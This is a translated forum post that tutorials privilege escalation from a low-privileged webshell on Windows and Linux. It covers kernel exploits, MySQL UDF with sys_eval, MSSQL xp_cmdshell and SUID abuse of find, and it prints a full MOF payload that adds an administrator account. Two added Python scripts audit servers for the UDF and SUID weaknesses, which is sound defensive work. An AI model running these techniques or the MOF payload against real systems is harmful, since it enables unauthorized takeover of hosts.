A summary of privilege escalation and the various ways to use it

Posted by millikan at 2020-03-24

This article is for readers who are learning privilege escalation, or who are about to start learning it. Experienced readers can skip it, since it is fairly basic. I am a beginner too. I want to summarize the postures and uses of privilege escalation and share some methods I find easy to use. Additions are welcome: if you know other easy-to-use escalation methods, please share them so we can all improve together. The article reflects my own understanding; if anything is wrong or badly written, please don't flame me, but do help me correct it.

As the name implies, privilege escalation means raising our level of permission. When we get a webshell on a site, in most cases our privilege is very low (usually just that of the Apache user). To "expand the results" we use privilege escalation to turn the original low privilege (for example, only allowed to list directories) into a high privilege (able to modify files), and the higher privilege helps us continue the penetration.

On Windows there are two kinds of local privilege escalation. One goes through local services such as IIS 6, IIS 5, FTP and SMB. The other goes through a system kernel vulnerability, such as the rather popular ms07-010, a vulnerability exposed on port 445; the system vulnerability is used to escalate. To make the escalation steps easier to follow, I decided to use "Ah Bao's" environment for testing (who Ah Bao is, I of course won't tell you) and to post screenshots. First we enter the host we have a shell on and run the 'systeminfo' command to see the host's basic information and which vulnerabilities have not been patched.

To find out which vulnerabilities can be exploited, check the target machine's version information (for example whether the host is x64 or x86), then look up which vulnerabilities apply to it.

There is usually an EXE to download for the matching Windows version, but it does not always work. So we need to build an environment like the target machine, test there first, and only after a successful test put the program onto the target for escalation. Here I directly demonstrate a script I have already tested.

Windows local privilege escalation steps:

First of all, get a shell. I won't cover how to get a shell; everything below assumes we already have one. If you see a database and can guess the password of the database account, you don't need a shell (but usually you can't guess it -_-); we can then use the database to escalate, which is discussed later. Upload the x64.exe we tested to the target machine.

Before running this script we can see that we do not have SYSTEM privilege.

Next we run x64.exe, which exploits the ms16-032 vulnerability. We can see the privilege has become SYSTEM, so the escalation succeeded.

A few points to note. Because we connect and execute commands through Caidao or AntSword, this is not an interactive shell (if you don't know what an interactive shell is, look it up on Baidu). So when we use these scripts, we have to append the command we want to run to the script invocation. With an interactive shell, for example via MSF, a command window pops up, and whatever command we run in that window runs with SYSTEM privilege. Other scripts can escalate too; you need to dig for them. Of course we can also escalate with a payload generated by MSF; the reverse shell MSF gives back is interactive, and we will talk about that later.

How Windows privilege escalation scripts are run (summary):

1. Run the EXE directly; on success a new CMD window opens, and in that window the privilege is SYSTEM.

2. Run the EXE from the webshell as "x64.exe whoami"; on success the command runs directly, and changing the command text runs a different command.

3. Use MSF or similar tools.

4. Special cases: C++ source code, Python scripts, PowerShell scripts.

On Linux, once the system is installed, its own software or kernel has vulnerabilities. The popular "Dirty COW" can be used, and so can vim or sudo. Linux kernel escalation works the same way as on Windows: download the script for the vulnerability and use it to escalate, except that a downloaded Linux escalation script must be compiled before it can be used. Compiling is very simple and is covered later.

Linux local privilege escalation steps:

After getting a shell we are usually the Apache user. Open the command bar and run the "uname -a" command to view the kernel version, then use the kernel version to escalate. We still use Ah Bao's environment for the demonstration. You can see the kernel version in the output.

Looking at the system version (RedHat family), we can see it is CentOS 6.5.

Then we need to find the vulnerability for that version and escalate. To avoid crashing the system, we install the same version of the system locally and test there first, so that we don't crash the target (I have crashed it several times). Generally a Linux escalation script is a .c file, so we need gcc on Linux to compile it. If the target machine does not have gcc, the only option is to build an identical environment, install gcc there and compile; the compile command is usually given in the script itself.

We take the tested Dirty COW script as an example. First upload the Dirty COW script, then compile it.

There is one extra step: we need to append a password after the script name. If neither we nor the administrator knows that password, nobody will be able to connect. After that the system may crash; I won't say more about it, so proceed with care.

Looking at the passwd file, we can see that the root user has become firefart, and then we can connect over SSH.

root becomes the user Dirty COW created; log in as that user and you have administrator privilege. Remember to move the file Dirty COW backed up back to its original place, otherwise the administrator will not be able to log in.

0x03 Database privilege escalation

MySQL privilege escalation

The preconditions are:

1. Having MySQL root privilege, with MySQL running under the system account.

2. Being able to execute SQL statements.

MySQL privilege escalation can be divided into:

1. Startup script

2. UDF

3. MOF

4. Scheduled tasks

We mainly introduce UDF escalation, because I personally think this database escalation method is relatively easy to use, although it requires write permission from the database.

Startup script: use MySQL to write a backdoor into the startup items. Because it is written to the startup entry and only runs at boot, the target server has to be restarted before it runs.

Linux UDF privilege escalation

You don't need to work out the MySQL version; just look at the plugin path and write the .so file straight into it. On Linux the library is a .so file, on Windows a DLL.

After getting the shell we open the terminal and run whoami; we find we are only the Apache user.

We can find the website's database configuration file and read the database account and password from it: the account is root with password root.

Log in to MySQL and run show variables like '%plugin%' to view the plugin path directly.

Then we use a hex editing tool to encode the .so file, decode it on the server and write it into that directory; the query returns true, so the write succeeded.

After writing it, execute the command that creates the function; a sys_eval function is created to execute system commands. Every system command executed through this function runs with the privilege of the MySQL service.

The sys_eval function executes system commands; put the system command inside the parentheses.
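Taking the defender's view of the preconditions just described, here is an added example (my own code, not from the original post) that evaluates, from the output of SHOW VARIABLES, SHOW GRANTS and mysql.func, whether a server is exposed to this UDF technique or already carries a sys_eval function. All sample values are constructed; secure_file_priv is a real MySQL variable the post does not mention, and the function and variable names are my own.

```python
import re

# Constructed sample data standing in for the output of
#   SHOW VARIABLES LIKE '%plugin%'  and  SHOW VARIABLES LIKE 'secure_file_priv'
#   SHOW GRANTS FOR CURRENT_USER()
#   SELECT name, dl FROM mysql.func
# on a server set up like the one in the post (account root/root, mysqld as root).
SAMPLE_VARIABLES = {"plugin_dir": "/usr/lib64/mysql/plugin/", "secure_file_priv": ""}
SAMPLE_GRANTS = ["GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION"]
SAMPLE_FUNCS = [("sys_eval", "udf.so")]  # what mysql.func holds after the procedure above

# Functions registered by the lib_mysqludf_sys library; a production server should not have them.
SUSPICIOUS_UDFS = {"sys_eval", "sys_exec", "sys_get", "sys_set"}
# FILE (or ALL) on *.* is what SELECT ... INTO DUMPFILE needs.
FILE_GRANT = re.compile(r"^GRANT (ALL PRIVILEGES|.*\bFILE\b).* ON \*\.\*", re.IGNORECASE)


def can_write_plugin_dir(variables):
    """Does secure_file_priv let INTO DUMPFILE reach plugin_dir?
    '' = anywhere, NULL/None = file writes disabled, a path = only below that path."""
    sfp = variables.get("secure_file_priv")
    if sfp is None or str(sfp).upper() == "NULL":
        return False
    if sfp == "":
        return True
    return variables["plugin_dir"].startswith(sfp.rstrip("/") + "/")


def assess_udf_exposure(variables, grants, func_rows, mysqld_user):
    """Return a list of findings; an empty list means none of the post's preconditions hold."""
    findings = []
    if mysqld_user in ("root", "SYSTEM"):
        findings.append(f"mysqld runs as {mysqld_user}; any UDF inherits that privilege")
    if any(FILE_GRANT.match(g) for g in grants):
        findings.append("DB account holds FILE/ALL on *.*; it can write files on the server")
    if can_write_plugin_dir(variables):
        findings.append(f"secure_file_priv allows writing into plugin_dir {variables['plugin_dir']}")
    for name, dl in func_rows:
        if name in SUSPICIOUS_UDFS:
            findings.append(f"mysql.func already defines {name} from {dl}: treat as compromised")
    return findings


if __name__ == "__main__":
    for finding in assess_udf_exposure(SAMPLE_VARIABLES, SAMPLE_GRANTS, SAMPLE_FUNCS, "root"):
        print("FINDING:", finding)
```

Running mysqld as an unprivileged account, setting secure_file_priv to NULL and granting the web application account only the table privileges it needs makes every finding go away.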

Windows UDF privilege escalation:

UDF can be understood as a MySQL function library: with UDF we can create user-defined functions. To use UDF you must upload udf.dll as the library that UDF executes. MySQL supports UDF extensions, which let us call functions inside a DLL to implement special functionality. First export the DLL file, then decide by MySQL version where it goes: below version 5.2 the UDF is exported to the system directory C:/Windows/system32/, and from version 5.2 on it is exported to the install path MySQL\lib\plugin\. The rest is the same as Linux UDF, so it is not demonstrated; the method is identical.

MOF privilege escalation (Windows only; generally works on older systems such as XP and Server 2003)

1. First find a writable directory and upload our MOF file.

2. Execute the SQL statement below, and the command inside the MOF file will be executed.

We upload the MOF file to C:/wmpub/nullevt.mof, then copy it to C:/Windows/system32/wbem/mof/nullevt.mof with:

select load_file('C:/wmpub/nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';

Copy this code into a file with the .mof suffix (the extraction had stripped every "Script" token, the leading underscores and the backslash escapes; they are restored here):

#pragma namespace("\\\\.\\root\\subscription")

instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};

instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText =
    "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";
};

instance of __FilterToConsumerBinding
{
    Consumer = $Consumer;
    Filter = $EventFilter;
};

Upload the MOF file to the target machine; you can edit the code to change the command it runs. The MOF method is rarely used these days because it is more troublesome, so for MySQL databases UDF is recommended.

Redis privilege escalation

1. Startup script

2. Unauthorized access: in general, because Redis is installed by compiling from source, it runs as root by default. Through unauthorized access to the database you can write arbitrary files and execute commands directly with an exploit.

3. MOF

4. Scheduled tasks

5. SSH public key

For MSSQL, so-called database privilege escalation is really about the privilege the database itself runs with, so we can escalate as long as the following conditions are met:

1. We obtain the password of the SA account, or of an account with the same privilege as SA, and MSSQL has not been de-privileged.

2. We can execute SQL statements in some way, for example through a webshell or a connection to port 1433.

MSSQL privilege escalation approach:

1. Startup script

2. Port 1433 is listening; obtain the account and password of the MSSQL SA account, then execute commands with exec xp_cmdshell 'whoami'.

If the MSSQL database runs with administrator privilege, the commands it executes run with administrator privilege.

Steps for MSSQL escalation: first we need a shell, or we find other vulnerabilities. I see that port 21 on the target machine is open, so we can connect over FTP directly, copy the configuration file and get the database account and password from it.

Connect with a database client tool, then run the command exec xp_cmdshell 'whoami'; you can see it is SYSTEM privilege.

0x04 Third-party software privilege escalation

On Linux there is the SUID permission. If a file has the s bit and ordinary users have execute permission on it, then when an ordinary user runs the file it executes with the privilege of the file's owner. First find the files with the s bit, then among them find ones that can execute commands. Linux executables of this kind include: nmap, vim, find, bash, more, less, nano, cp.

This command finds SUID files owned by root:

find / -user root -perm -4000 -print 2>/dev/null

Let's demonstrate with the find command. First locate the find binary; you can use the whereis command to find its directory. We add the s bit to find.

Create a new user to experiment with.

We can see that our privilege is that of user qqq.

You can see that after entering this command our privilege becomes root, and the escalation succeeded.
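From the administrator's side, the find command above is the audit that catches a planted s bit like the one in this demonstration. As an added example (my own code, not from the original post), here it is in Python: it walks the filesystem the same way and splits the SUID-root hits into the names the post lists as abusable and everything else. The RISKY_SUID_NAMES set, the owner_uid parameter and the function names are my own choices.

```python
import os
import stat

# Binaries the post lists as able to run commands or read/write files when
# they carry the SUID bit; an audit should flag these for review.
RISKY_SUID_NAMES = {"nmap", "vim", "find", "bash", "more", "less", "nano", "cp"}


def find_suid(root, owner_uid=0):
    """Return regular files under `root` that have the SUID bit set and are
    owned by `owner_uid` (0 = root), the Python equivalent of the post's
    `find / -user root -perm -4000`; unreadable entries are skipped."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue
            if (stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID
                    and st.st_uid == owner_uid):
                hits.append(path)
    return sorted(hits)


def flag_risky(paths):
    """Split SUID hits into (risky, other) by basename, risky meaning the
    name is one the post lists as abusable."""
    risky = [p for p in paths if os.path.basename(p) in RISKY_SUID_NAMES]
    other = [p for p in paths if os.path.basename(p) not in RISKY_SUID_NAMES]
    return risky, other


if __name__ == "__main__":
    risky, other = flag_risky(find_suid("/"))
    for p in risky:
        print("REVIEW (known abusable SUID-root binary):", p)
    print(f"{len(other)} other SUID-root files found")
```

Comparing a fresh run against a baseline taken when the host was built shows exactly which s bit was added, which is how the change made to find in this section would be spotted.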

As for MSF, I will cover it in the next article if I can. If anything is badly written, please don't flame me; writing this was tiring, but corrections are welcome, and let's learn together. That is the original intention. Thank you for reading.